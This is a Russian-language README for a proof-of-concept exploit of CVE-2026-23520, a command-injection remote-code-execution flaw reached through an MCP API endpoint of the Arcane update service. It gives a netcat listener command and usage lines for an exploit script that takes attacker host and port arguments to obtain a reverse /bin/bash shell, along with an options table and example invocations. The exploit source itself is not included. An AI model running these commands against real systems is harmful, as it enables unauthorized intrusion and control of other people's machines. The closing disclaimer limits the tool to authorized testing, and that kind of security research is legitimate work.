
Доказательство концепции эксплуатации для CVE-2026-23520 — уязвимости внедрения команд в службе обновления Arcane, позволяющей удалённое выполнение кода через специально сформированные API-запросы.
Этот репозиторий содержит Proof-of-Concept (PoC) эксплойт для уязвимости удалённого выполнения команд (RCE), затрагивающей приложения, которые предоставляют уязвимую конечную точку MCP API (обычно /api/mcp/connect).
Уязвимость позволяет выполнять системные команды через специально сформированный API-запрос.
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| Аргумент | Описание |
|---|---|
| target | IP-адрес, домен или URL цели |
| --lhost | IP-адрес атакующего |
| --lport | Порт атакующего |
| Флаг | Описание |
|---|---|
| -p, --port | Порт цели (по умолчанию: 443) |
| -s, --scheme | http или https (по умолчанию: https) |
| -e, --endpoint | Путь к конечной точке API |
| -t, --timeout | Таймаут запроса |
| -v, --verbose | Отладочный вывод |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash.Только для авторизованного тестирования и образовательных целей.
Parosh B